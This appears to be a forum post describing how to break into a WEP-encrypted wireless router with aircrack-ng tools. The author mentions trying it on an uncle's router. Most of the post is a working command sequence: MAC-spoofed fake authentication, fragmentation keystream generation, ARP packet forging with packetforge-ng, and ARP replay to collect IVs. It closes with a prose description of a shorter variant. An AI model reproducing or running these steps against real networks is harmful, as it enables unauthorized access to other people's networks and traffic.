I know the authentication attack on aireplay doesn't work ALL the time so can I ask. If you had to get into a router that had no clients connected and it wouldnt let you authenticate? (i tried this on my uncles router and let me tell you its a CRAP router [siemens speedstream 6250] and if that didnt let me authenticate i dnt think more advanced ones will either...) what would you do? what method would you do to circumvent? once again purely hypothetical i only ask because once i couldnt break into my uncs router i was pretty much stumped.
also i noticed ssomething quite cool.. i plugged in 2 wifi cards to my lappy.. the first (rausb0) i authenticated to a router (no attacks were working on this 128bit encrypted session) the second in monitor mode.
so then i pretended to be a remote user (yea i bought a new change of clothes changed my accent,... everything! lol) and with ra0 i tried fake authentication, didnt work. I tried de-authenticating the second card, didnt work. so heres what i did:
i noted the mac number that was connected (mac number of rausb0) and then i did a fake authentication with it (even though the second card was already authenticated) it took a bit longer and i had to do that twice each time i tested but eventually it said authentication successful.
- client mac address = $WIFI
Access point Mac Address = $AP
airodump-ng --ivs -w test --channel 11 --bssid $AP ra0 // start airodump and see connected clients
Note down connected client mac address
aireplay-ng -1 0 -a $AP -h $WIFI ra0 //fake authentication attack with client thats already connected
after that i forged a valid keystream (aireplay-ng -5) which also took a bit longer than usual but it worked. from then on it was packetforge with IPs set to 255.255.255.255 and all the time make sure ure setting the MAC Source as the connected client.
- aireplay-ng -5 -b $AP -h $WIFI ra0 //generating keystream
packetforge-ng -y fragment.xor -w arppacket -k 255.255.255.255 -l 255.255.255.255 -0 -a $AP -h $WIFI //use packetforge to make an arp-request packet from the connected clients mac address, for command line definitions look it up in the software. Fragment.xor should be replaced by the fragment file created by the previous aireplay-ng command.
And now all that is left is to replay this packet and watch airodump fly
- aireplay-ng -3 -r arppacket -b $AP -h $WIFI ra0 //replay saved ARP packet to router
I hope everyone understands this.
Im sure there is a shorter alternative out there but im still looking for it lol
woo i found a shorter alternative!
im not gonna give the commands in this though im sure most people here already know em
you start airodump and get a connected client,
then you start aireplay on -3 attack and leave it waiting for an arp packet (set source to client mac address)
and after that you open another konsole and run aireplay -1 with delay of 0 using the connected clients mac address
this worked for me even though i wasnt authenticated. but eventually the packets started increasing in airodump.